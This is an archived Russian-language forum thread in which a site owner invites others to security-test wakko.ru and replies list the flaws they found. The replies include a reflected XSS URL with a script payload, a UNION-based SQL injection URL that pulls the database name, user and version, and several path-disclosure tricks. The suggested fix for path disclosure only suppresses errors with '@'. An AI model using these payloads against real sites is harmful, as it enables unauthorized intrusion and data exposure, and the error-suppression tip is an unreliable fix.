Просмотр полной версии : Маленький проект проверьте
Проверьте пожалуйста http://wakko.ru/
Гостевую, регистрацию и востановление пароля.
Спасибо.
[NiGHT]DarkAngel
13.11.2009, 15:53
Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1
Не особо страшно, но все же не фильтруется
Раскрытие путей при подмене сессии:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /путь/index.php on line 3
Подмена заголовков,поле User-Agent
Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1
Исправил. Спасибо.
Раскрытие путей при подмене сессии:
А как избавлиться т этого можно?
XSS
http://wakko.ru/?do=members&orderby=1<script>alert(12345)</script>
ILYAtirtir
07.12.2009, 05:29
SQL inj
http://wakko.ru/index.php?do=profile&name=administratorrrr'+union+select+1,concat_ws(0x 3a,database(),user(),version()),3,4,5,6,7,8,9,10,1 1,12--+
раскрытие путей
http://wakko.ru/index.php?do=profile&name[]=administrator
А как избавлиться т этого можно?
Поставить собачку перед сессион_старт в 3й строке.
@session_start();
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot